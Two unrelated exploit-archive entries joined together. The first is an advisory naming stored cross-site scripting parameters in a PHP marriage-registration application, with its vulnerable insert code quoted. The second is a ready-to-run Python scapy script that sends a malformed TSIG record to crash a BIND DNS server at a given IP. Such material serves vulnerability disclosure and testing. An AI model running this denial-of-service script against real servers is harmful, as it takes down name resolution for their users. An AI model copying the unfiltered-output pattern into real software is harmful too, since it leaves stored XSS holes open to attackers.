Exploit Title: Online Marriage Registration System 1.0 - Persistent Cross-Site Scripting # Google Dork: N/A # Date: 2020-05-26 # Exploit Author: that faceless coder(Inveteck Global) # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/ # Version: Online Marriage Registration System 1.0 - Stored Cross-Site Scripting # Tested on: MAC OS MOJAVE v 10.14.6 # CVE : N/A The Online Marriage Registration System suffers from multiple stored cross-site script vulnerabilities: if(isset($_POST['submit'])) { $nofhusband=$_POST['nofhusband']; $hreligion=$_POST['hreligion']; $haddress=$_POST['haddress']; $hstate=$_POST['hstate']; $nofwife=$_POST['nofwife']; $wreligion=$_POST['wreligion']; $waddress=$_POST['waddress']; $wstate=$_POST['wstate']; $witnessnamef=$_POST['witnessnamef']; $waddressfirst=$_POST['waddressfirst']; $witnessnames=$_POST['witnessnames']; $waddresssec=$_POST['waddresssec']; $witnessnamet=$_POST['witnessnamet']; $waddressthird=$_POST['waddressthird']; $sql="insert into tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)"; $query=$dbh->prepare($sql); $sql="insert into 
tblregistration(RegistrationNumber,UserID,DateofMarriage,HusbandName,HusImage,HusbandReligion,Husbanddob,HusbandSBM,HusbandAdd,HusbandZipcode,HusbandState,HusbandAdharno,WifeName,WifeImage,WifeReligion,Wifedob,WifeSBM,WifeAdd,WifeZipcode,WifeState,WifeAdharNo,WitnessNamefirst,WitnessAddressFirst,WitnessNamesec,WitnessAddresssec,WitnessNamethird,WitnessAddressthird)values(:regnumber,:uid,:dom,:nofhusband,:husimg,:hreligion,:hdob,:hsbmarriage,:haddress,:hzipcode,:hstate,:hadharno,:nofwife,:wifeimg,:wreligion,:wdob,:wsbmarriage,:waddress,:wzipcode,:wstate,:wadharno,:witnessnamef,:waddressfirst,:witnessnames,:waddresssec,:witnessnamet,:waddressthird)"; $query=$dbh->prepare($sql); $query->bindParam(':nofhusband',$nofhusband,PDO::PARAM_STR); $query->bindParam(':hreligion',$hreligion,PDO::PARAM_STR); $query->bindParam(':hdob',$hdob,PDO::PARAM_STR); $query->bindParam(':hsbmarriage',$hsbmarriage,PDO::PARAM_STR); $query->bindParam(':haddress',$haddress,PDO::PARAM_STR); $query->bindParam(':hzipcode',$hzipcode,PDO::PARAM_STR); $query->bindParam(':hstate',$hstate,PDO::PARAM_STR); $query->bindParam(':hadharno',$hadharno,PDO::PARAM_STR); $query->bindParam(':nofwife',$nofwife,PDO::PARAM_STR); $query->bindParam(':wifeimg',$wifeimg,PDO::PARAM_STR); $query->bindParam(':wreligion',$wreligion,PDO::PARAM_STR); $query->bindParam(':wdob',$wdob,PDO::PARAM_STR); $query->bindParam(':wsbmarriage',$wsbmarriage,PDO::PARAM_STR); $query->bindParam(':waddress',$waddress,PDO::PARAM_STR); $query->bindParam(':wzipcode',$wzipcode,PDO::PARAM_STR); $query->bindParam(':wstate',$wstate,PDO::PARAM_STR); $query->bindParam(':wadharno',$wadharno,PDO::PARAM_STR); $query->bindParam(':witnessnamef',$witnessnamef,PDO::PARAM_STR); $query->bindParam(':waddressfirst',$waddressfirst,PDO::PARAM_STR); $query->bindParam(':witnessnames',$witnessnames,PDO::PARAM_STR); $query->bindParam(':waddresssec',$waddresssec,PDO::PARAM_STR); $query->bindParam(':witnessnamet',$witnessnamet,PDO::PARAM_STR); 
$query->bindParam(':waddressthird',$waddressthird,PDO::PARAM_STR); $query->execute(); $LastInsertId=$dbh->lastInsertId(); if ($LastInsertId>0) { echo '<script>alert("Registration form has been filled successfully.")</script>'; } else { echo '<script>alert("Something Went Wrong. Please try again")</script>'; } The data gets stored through the mentioned vulnerable parameters into the database. There is no filtering when those values are printed when the web application fetches the data from the database
-
BIND - 'TSIG' Denial of Service
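#!/usr/bin/python
#coding:utf-8
"""Send one DNS query carrying a malformed TSIG record (empty MAC, non-zero error
field) to a BIND server and print whatever comes back.

Usage: script.py [target_ip]   (default 127.0.0.1; scapy needs raw-socket privileges)

A server that crashes on the record never answers, so a missing reply is
reported explicitly instead of raising on a None result as the original did.
"""
import sys
from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT

TARGET = sys.argv[1] if len(sys.argv) > 1 else '127.0.0.1'
TIMEOUT = 5  # seconds to wait for an answer before concluding the server went silent

# TSIG pseudo-record with no MAC at all (mac_len=0, mac_data="") but error=16
# (BADSIG in RFC 2845). The key name presumably has to match one the target
# knows for the record to reach its verification path; adjust if needed.
tsig = DNSRRTSIG(rrname="local-ddns", algo_name="hmac-sha256", rclass=255, mac_len=0, mac_data="", time_signed=0, fudge=300, error=16)
dns_req = IP(dst=TARGET)/UDP(dport=53)/DNS(rd=1, ad=1, qd=DNSQR(qname='www.example.com'), ar=tsig)
answer = sr1(dns_req, verbose=0, timeout=TIMEOUT)
if answer is None or DNS not in answer:
    print("no DNS answer from %s within %d s (server crashed or dropped the query?)" % (TARGET, TIMEOUT))
else:
    print(answer[DNS].summary())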